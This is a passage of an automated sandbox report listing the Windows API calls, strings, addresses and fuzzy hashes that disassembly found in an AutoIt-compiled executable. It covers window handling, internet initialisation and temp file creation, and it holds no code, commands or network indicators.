• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                  • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                  • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D5DB75
                                                                                                                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D5DB7F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                  • String ID: |
                                                                                                                                                                                                                                                                  • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00D740BD
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D740F8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00D750BD
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D750D2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID: '
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00CE78B1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: GetStockObject.GDI32(00000011), ref: 00CE78C5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE78CF
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D74216
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00D74230
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                  • Opcode ID: 7ba851212d4d0d0f8318e83d471ec6a638dd6877e1f7ca55429489a2c38e9658
                                                                                                                                                                                                                                                                  • Instruction ID: ee1e8ccbaeea96ee83570a72426d4e44267ce4e11169db0e2f0ecc207a09e983
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba851212d4d0d0f8318e83d471ec6a638dd6877e1f7ca55429489a2c38e9658
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09112672610209AFDB01DFA8CC45AFA7BB8EF08314F058914F959E3251E735E8619B60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D5D7C2
                                                                                                                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D5D7EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                  • String ID: <local>
                                                                                                                                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                  • Opcode ID: 235248c5bdb15f6237b815a42f84201b7fe684bd2420199f10634a528ad912b4
                                                                                                                                                                                                                                                                  • Instruction ID: 2e99678bd234dd963a61ab0438a08a200b75ae12bbcaf3937f7736769bdf9acb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 235248c5bdb15f6237b815a42f84201b7fe684bd2420199f10634a528ad912b4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5711297120223279DB384F628C45EF7BE5EEF167A6F104216FD4AC3180D2608848C6F0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 00D4761D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D47629
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: STOP
                                                                                                                                                                                                                                                                  • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                  • Opcode ID: 1bb3bdd8fa44a1fa07c5674afb5b08710577b1aded89d4e7a7e55098b639f63f
                                                                                                                                                                                                                                                                  • Instruction ID: 8b04c499bace9fdeb365292a1068f6c583297663d9f2e1d54cfcd4eae2123294
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bb3bdd8fa44a1fa07c5674afb5b08710577b1aded89d4e7a7e55098b639f63f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501C032A04A2A8BCB60AFBDDC809BF73B6BF6075075A0924E425D2295EB31DD149660
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D42699
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 9b58eb1d001d2bdc0fb7500ef4a1fb6ef95a17327bb2515ee7799cba8c1b3bda
                                                                                                                                                                                                                                                                  • Instruction ID: 492fe2591fe088b4812eeb7c77dec03a18598af824a31759b7857851c30fdb89
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b58eb1d001d2bdc0fb7500ef4a1fb6ef95a17327bb2515ee7799cba8c1b3bda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D01D475601214ABCB04EBA4CC51DFF7779EF46350B440A19F872973D1DA71990CD670
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D42593
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D42615
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00D42720
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D4146F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                  • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D010E2,?,?,?,00CE100A), ref: 00CFFAD9
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00CE100A), ref: 00D010E6
                                                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00CE100A), ref: 00D010F5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D010F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                  • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00D539F0
                                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D53A05
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                  • String ID: aut
                                                                                                                                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D72E08
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000), ref: 00D72E0F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4F292: Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D72DC8
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D72DDB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4F292: Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D1C213
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D1C221
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D1C27C
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1717984340-0